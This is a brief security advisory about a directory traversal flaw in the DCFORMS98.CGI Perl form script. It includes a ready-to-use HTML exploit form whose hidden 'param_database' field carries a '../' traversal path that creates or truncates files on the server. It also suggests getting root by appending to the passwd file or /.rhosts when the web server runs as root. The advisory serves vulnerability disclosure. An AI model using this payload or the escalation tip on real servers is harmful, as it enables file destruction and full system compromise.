suid@suid.kg - mini advisory - DCFORMS98.CGI Software: DCFORMS98.CGI Vendor: dcscripts.com URL: http://www.dcscripts.com/dcforms98.shtml Version: Version 1.0 Platforms: Unix Type: Input validation problem Summary: Anyone can create / truncate any file owned by the web server user (nobody/apache/whatever). Vulnerability: The perl code does no input validation so reverse directory transversal is possible when specifying a `param_database`. Exploit: Build a HTML form resembling: <form action=/cgi-bin/dcforms98.cgi method=post> <INPUT TYPE="hidden" name="param_recipient" value="non@existant"> <INPUT TYPE="hidden" name="param_subject" value="X"> <INPUT TYPE="hidden" name="param_env_report" value=""> <INPUT TYPE="hidden" name="param_order" value="Name"> <!-- This is obviously the problem --> <INPUT TYPE="hidden" name="param_database" value="../../../../../../../../../../tmp/xxx"> <INPUT TYPE="hidden" name="param_required" value="Name"> <INPUT TYPE="hidden" name="param_redirect_url" value=""> <input type=hidden name=Name value=blah> <input type=submit> </form> If httpd is running with UID == 0, you could easily get root by adding to the passwd file or /.rhosts. Of course you could simply send this in a POST request directly to the web server. Whatever. http://www.suid.edu/advisories/005.txt EOF